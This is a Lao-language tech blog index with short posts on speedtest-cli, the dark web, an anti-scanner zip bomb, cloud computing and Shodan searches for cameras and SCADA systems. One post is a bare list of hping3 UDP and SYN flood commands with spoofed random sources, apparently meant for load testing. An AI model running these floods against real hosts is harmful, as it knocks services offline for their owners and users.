Monday, July 31, 2017
ຖ້າເຮົາໃຊ້ Ubuntu Server ຢູ່ ຫລື ວ່າ Debian Server ກໍ່ຕາມ ແຕ່ເຮົາຢາກກວດສອບວ່າ ຄວາມໄວອິນເຕີເນັດ ໃນ ເຊີເວີເຮົາມີເທົ່າໃດ ຂ້າພະເຈົ້າມີໂປຣແກຣມຫນຶ່ງ ມາແນະນຳ ນັ້ນກະຄື speedtest-cli
ມີຂັ້ນຕອນດັ່ງນີ້:
1. ດາວໂຫລດ speedtest-cli
wget -O speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py
Image does not exist: https://image.ibb.co/hb0k4k/downspeedtest.png
2. ກຳນົດສິດໃຫ້ speedtest-cli ສາມາດ Run ໄດ້
[Read more…]
Friday, July 28, 2017
ຫຼາຍຄົນໜ້າຈະເຄີຍໄດ້ຍິນຄຳວ່າ Dark Web ຜ່ານສື່ກັນມາແດ່ ຕົວຢ່າງເຊັ່ນຂ່າວການຈັບກຸມເຈົ້າຂອງເວັບໄຊຕ໌ຊື້ຂາຍຂອງຜິດກົດຫມາຍ ລັກສະນະການເຮັດວຽກຂອງ Dark Web ສາມາດອະທິບາຍໃຫ້ເຂົ້າໃຈງ່າຍໆ ໄດ້ດັ່ງນີ້
Surface Web ຄືເວັບໄຊຕ໌ທີ່ເປີດໃຫ້ເຂົ້າເຖິງໄດ້ດ້ວຍວິທີປົກກະຕິ (ຮູ້ຈັກກັນໃນຊື່ World Wide Web) ສາມາດຄົ້ນຫາເວັບໄຊຕ໌ເຫຼົ່ານີ້ໄດ້ຜ່ານ Search engine
Deep Web ເປັນເວັບໄຊຕ໌ທີ່ບໍ່ປາກົດໃນຖານຂໍ້ມູນ Search engine ແລະ ບໍ່ເປີດໃຫ້ບຸກຄົນພາຍນອກເຂົ້າເຖິງໄດ້ດ້ວຍວິທີປົກກະຕິ ເຊັ່ນ ເວັບທີ່ໃຊ້ງານສະເພາະເຄືອຂ່າຍພາຍໃນອົງກອນ
Dark Web ເປັນເວັບໄຊຕ໌ທີ່ຕັ້ງໃຈຊ່ອນອຳພາງການເຂົ້າເຖິງ ປົກປິດຂໍ້ມູນຜູ້ຢູ່ເບື້ອງຫຼັງ ໂດຍສ່ວນໃຫຍ່ມີຈຸດປະສົງເພື່ອໃຊ້ໃນເຊີງຜິດກົດຫມາຍ
ການເຂົ້າເຖິງ Dark Web ຈະຕ້ອງໃຊ້ຊ່ອງທາງພິເສດ ເຊັ່ນ ເຂົ້າຜ່ານເຄືອຂ່າຍ Tor ຫລື I2P ຊຶ່ງເປັນການເຂົ້າເຖິງແບບບໍ່ລະບຸຕົວຕົນ (Anonymous) ແລະ ກວດສອບຢ້ອນກັບເສັ້ນທາງໄດ້ຍາກ ເນື້ອຫາໃນ Dark Web ໂດຍສ່ວນໃຫຍ່ມັກເປັນເລື່ອງຜິດກົດຫມາຍ ຫລື ອາຊະຍາກຳ ເຊັ່ນ ຊື້ຂາຍຢາເສບຕິດ ຂາຍອາວຸດ ຄ້າມະນຸດ ຊື້ຂາຍມັນແວຣ໌ ຫລື ຊື້ຂາຍຂໍ້ມູນທີ່ຖືກລັກອອກມາ ເປັນຕົ້ນ
[Read more…]
Sunday, July 23, 2017
ມື້ນີ້ເຈີ blog ທີ່ໜ້າສົນໃຈຂອງ Christian Haschek ມາເລີຍເອົາມາປັບກັບເວັບໄຊດ໌ເລື່ອງຂອງເລື່ອງຄື ຕົວ Christian ເຄົ້າເບື່ອພວກທີ່ມັກມານັ່ງໃຊ້ເຄື່ອງມືມາ scan ເວັບໄຊດ໌ຂອງເຂົາ ຫລື ພວກທີ່ພະຍາຍາມຈະເຈາະໄປທີ່ wp-admin ຂອງເຂົາ ກໍເລີຍເຮັດເລື່ອງ Zip Bomb ຂຶ້ນມາຕອບໂຕ້ຄົນເຫລົ່ານັ້ນ
Zip bomb ຄືການທີ່ເຮົາໃຊ້ງານ zip ເພື່ອກທຳການບີບອັດໄຟລ໌ຂະໜາດໃຫຍ່ໆທີ່ບໍ່ມີຫຍັງເລີຍນອກຈາກ 0 (zero) ໄວ້ ຊຶ່ງໂດຍປົກກະຕິແລ້ວ web browser ແລະ ເຄື່ອງມືການ scan ສ່ວນໃຫຍ່ຮອງຮັບການສົ່ງຂໍ້ມູນ http ແບບບີບອັດ (gzip) ຢູ່ແລ້ວ ດັ່ງນັ້ນຫາກມີໃຜ scan ເຂົ້າມາກໍຈະສົ່ງ zip file ກັບໄປໃຫ້ແທນນັ້ນເອງ
zip ສາມາດເຮັດວຽກບີບອັດໄດ້ຂະໜາດໃດ ຈະມີບັນຫາການສົ່ງເຮັດໃຫ້ຝັ່ງເຮົາຕ້ອງເສຍ bandwidth ຂາ upload ໄປແທນ ຫລື ບໍ? ຍົກຕົວຢ່າງໃຫ້ດັ່ງນີ້ລະກັນ ເຮົາສາມາດ zip ໄຟລ໌ຂະໜາດ 4.5 Peta Byte ( 4,500,000 GB) ໃຫ້ເຫລືອແຕ່ 42 kilobyte ເທົ່ານັ້ນ ເມື່ອພະຍາຍາມເປີດໄຟລ໌ດັ່ງກ່າວຈະເຮັດໃຫ້ເກີດອາການ disk ເຕັມ ແລະ RAM ໝົດໄດ້ ແຕ່ເນື່ອງດ້ວຍ http ບໍ່ຮອງຮັບ zip ເຮັດໃຫ້ເຮົາຕ້ອງໄປໃຊ້ gzip ແທນ ຊຶ່ງຜົນຮັບກໍແຕກຕ່າງກັນຢູ່ແຕ່ກໍຍັງຖືວ່າໄດ້ຜົນດີີລະດັບໜຶ່ງເລີຍລະ
[Read more…]
Saturday, July 22, 2017
1. UDP Flood
hping3 --udp --flood -p
hping3 --udp -d --flood -p
hping3 --udp -c --rand-source -d --flood -p
hping3 --udp -c 15000 --rand-source -d 15000 --flood -p 80 target.com
2. TCP SYN Flood
hping3 -S -P -U --flood --rand-source target.com
hping3 -S -L -w --flood -p 80 target.com
hping3 -S -L 0 -w 64 --flood -p 80 target.com
3. Apache Benchmarking tool
ab -c -n
ab -c 1000 -n 10000 http://target.com/
4. ການໃຊ້ tcpreplay + ແກ້ໄຂ
Generate cache file
- tcpprep –auto=first –pcap=icmp.pcap –cachefile=icmp_in.cache
Rewrite end points to 172.16.0.1/172.16.0.2 [ping 2->1, reply, 1->2]
- tcprewrite –endpoints=172.16.0.1:172.16.0.2 -i out.pcap -o out2.pcap –cachefile=icmp_in.cache
Rewrite macs too [ping (172.16.0.2)00:01:02:03:04:05 -> (172.16.0.1)06:07:08:09:10:11, reply: vice-versa]
- tcprewrite –endpoints=172.16.0.1:172.16.0.2 –enet-smac=00:01:02:03:04:05,06:07:08:09:10:11 –enet-dmac=06:07:08:09:10:11,00:01:02:03:04:05 -i icmp.pcap -o out2_macs.pcap –cachefile=icmp_in.cache
ຫາກແກ້ໄຂ checksum ໂດຍທີ່ໃຊ້ - C ຂອງ tcprewrite ເພື່ອທຳການຄິດໄລ່ checksum ໃໝ່ ໃຫ້ໃຊ້ pcapfix ໃນການແກ້ໄຂແທນ
ຂໍ້ມູນຈາກ techsuii.com
Wednesday, July 5, 2017
Cloud computing ແມ່ນຫຍັງ ແລະ ມີປະໂຫຍດແນວໃດ?
Cloud computing ເປັນເຕັກໂນໂລຊີໃໝ່ ທີ່ກຳລັງໄດ້ຮັບຄວາມສົນໃຈ ຈາກຫຼາຍພາກສ່ວນ ເຖິງວ່າຈະຢູ່ໃນຊ່ວງເລີ້ມຕົ້ນ ຂອງການພັດທະນາ ດ້ານສະຖາປັດຕິຍະກຳ
ລະບົບ ແຕ່ກໍຖືວ່າເປັນການຕອບໂຈດ ທັງດ້ານຄວາມຕ້ອງການຂອງຜູ້ໃຊ້ ແລະ ຊັບພະຍາກອນທີ່ຈຳກັດ ເຊັ່ນ ຜູ້ໃຊ້ວຽກລະບົບຕ້ອງການເນື້ອທີ່ໃນການເກັບຂໍ້ມູນ ຄວາມໄວໃນການ ປະມວນຜົນ ແລະ ຕິດຕໍ່ກັບລູກຄ້າ Cloud computing ຈະເຂົ້າມາເຮັດການປະມວນຜົນຕາມຄວາມຕ້ອງການໃນເລື່ອງຂອງເນື້ອທີ່ ແລະ ສາມາດຈຳກັດ
ຄວາມໄວໃນການ ປະມວນຜົນໃຫ້ຖືກກັບຄວາມຕ້ອງການຂອງຜູ້ໃຊ້ວຽກທີ່ຂໍໄປ ໂດຍໃຫ້ຄອມພີວເຕີທີ່ເຮັດວຽກຮ່ວມກັນ ເຊື່ອມໂຍ່ງ ແລະ ແບ່ງກັນປະມວນຜົນ
ຊື່ງຄອມພີວເຕີທີ່ຮ່ວມປະມວນຜົນຫຼາຍໆໜ່ວຍ ບໍ່ຈຳເປັນຕ້ອງຕັ້ງຢູ່ບ່ອນດຽວກັນ ແຕ່ເຊື່ອມຕໍ່ກັນຜ່ານລະບົບເຄື່ອຂ່າຍແບບ Grid ຄອມພີວເຕີ ທີ່ປະມວນຜົນໃນກຸ່ມ ທີ່ເຮົາເອີ້ນວ່າ Cloud. ອາດຈະເປັນ ຄອມພີວເຕີທີ່ບໍ່ໄດ້ມີລະບົບປະຕິບັດການ ແລະ ຊັບພະຍາກອນຄືກັນ ແລະ ໜ້າຈໍຂອງຜູ້ໃຊ້ວຽກ User Interface ຈະສະແດງຜົນທີ່ວ່ອງໄວຕາມຄວາມຕ້ອງການຂອງລະບົບທີ່ຮ້ອງຂໍໄປ ໂດຍທີ່ຜູ້ໃຊ້ບໍ່ຈຳເປັນຕ້ອງຮູ້ວ່າ ເບື້ອງຫຼັງນັ້ນລະບົບຈະເຮັດວຽກກັນແນວໃດ
[Read more…]
Tuesday, June 27, 2017
ໃຊ້ເວັບໄຊ shodan ເປັນເວັບໄຊໃຫ້ບໍລິການຄົ້ນຫາຂໍ້ມູນເທີງອິນເຕີເນັດ ທີ່ສົ່ງພະລັງ ແລະ ໃຫ້ຂໍ້ມູນຫລາກຫລາຍ
ເຂົ້າເວັບໄຊ https://www.shodan.io/ ແລະ ມີວິທີການຄົ້ນຫາດັ່ງນີ້:
ໜ້າເວັບໄຊ
Image does not exist: https://image.ibb.co/b17mSk/shodanweb.png
ຄົ້ນຫາ ກ້ອງ ໃນປະເທດ USA ໃສ່: camera country: “US”
Image does not exist: https://image.ibb.co/m1QHYQ/shodanweb1.png
ຄົ້ນຫາລະບົບ Scada ໃສ່: scada
Image does not exist: https://image.ibb.co/fM40nk/shodanweb2.png
[Read more…]
ມີເວັບໄຊໜຶ່ງທີ່ໃຊ້ສຳລັບກວດສອບລີ້ງສັ້ນໆ ຈາກ t.co, goo.gl, amzn.to, tinyurl.com, ow.ly, youtu.be ແລະ ອື່ນໆ
ທ່ານສາມາດລອງໄດ້ທີ່ເວັບ http://www.checkshorturl.com/
Image does not exist: https://image.ibb.co/h0W2iQ/checkurl.png